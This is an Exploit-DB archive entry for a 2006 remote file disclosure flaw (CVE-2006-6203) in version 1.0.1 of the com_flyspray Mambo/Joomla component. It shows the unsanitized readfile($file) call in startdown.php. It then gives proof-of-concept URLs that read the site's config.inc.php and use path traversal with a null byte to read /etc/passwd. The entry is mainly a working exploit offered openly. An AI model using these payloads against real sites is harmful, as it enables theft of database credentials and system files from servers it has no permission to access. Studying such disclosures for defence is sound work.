com_flyspray Mambo Com. <= 1.0.1 - Remote File Disclosure Vulnerability

2006-11-26T00:00:00
ID EDB-ID:2852
Type exploitdb
Reporter 3l3ctric-Cracker
Modified 2006-11-26T00:00:00

Description

com_flyspray Mambo Com. <= 1.0.1 Remote File Disclosure Vulnerability. CVE-2006-6203. Webapps exploit for php platform

                                        
                                            _____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |&gt;  &lt;     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/


*****************************************************************************************************************************
Compononent name:com_flyspray
Affected Version:1.0.1
d.page:http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
*****************************************************************************************************************************
Authour: Dr Max Virus
Location:Egypt
*****************************************************************************************************************************
Bug in :startdown.php
Vul Code:
In Line 52:
readfile($file);
Problem:The variable of file not sanitized So u can read any file on server
and also config file
*****************************************************************************************************************************
POC:

http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
*****************************************************************************************************************************
Thx To:str0ke & Nukedx & Thehacker & All My Friends
Special Gr33Ts:ASIANEAGLE & The Master &Kacper
****************************************************************************************************************************

# milw0rm.com [2006-11-26]